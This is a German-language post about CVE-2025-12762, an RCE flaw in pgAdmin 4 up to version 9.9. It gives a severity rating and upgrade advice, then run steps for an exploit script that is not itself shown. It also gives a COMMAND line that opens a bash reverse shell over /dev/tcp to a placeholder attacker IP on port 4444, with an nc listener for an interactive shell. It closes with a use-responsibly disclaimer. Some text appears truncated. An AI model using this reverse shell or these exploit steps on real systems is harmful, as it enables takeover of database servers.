
CVE-2025-12762

In pgAdmin 4 Versionen ≤ 9.9 existiert eine Remote Code Execution (RCE)-Schwachstelle.
Angreifer können beliebige Befehle auf dem Host ausführen, wenn pgAdmin im Server-Modus läuft und einen SQL-Dump im PLAIN-Format während der Wiederherstellung verarbeitet.
🟥 9.1 / 10 — Kritisch
⬆️ Upgrade auf pgAdmin 4 v10.0 oder höher
pgAdmin wird häufig für die Verwaltung kritischer PostgreSQL-Datenbanken verwendet, was bedeutet:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
Nach der Ausführung prüfen:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
Datei vorhanden → Sie haben CVE-2025-12762 tatsächlich ausgenutzt.
Ersetzen Sie die COMMAND-Zeile durch:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Dann nc -lvnp 4444 → vollständige interaktive Shell.
Dies ist das exakte Skript, das Forscher, Pentester und Red Teams weltweit im November 2025 verwenden.
Verwenden Sie es verantwortungsvoll. Patchen Sie alles. Bleiben Sie legal.
Dieser PoC wird ausschließlich für autorisierte Tests und Bildungszwecke bereitgestellt.
Sie dürfen ihn ausschließlich auf Systemen ausführen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
Jede unbefugte Nutzung ist illegal und verstößt gegen Gesetze zum Computerbetrug.
Verwenden Sie ihn verantwortungsvoll, patchen Sie sofort nach dem Test und greifen Sie niemals Systeme ohne Erlaubnis an.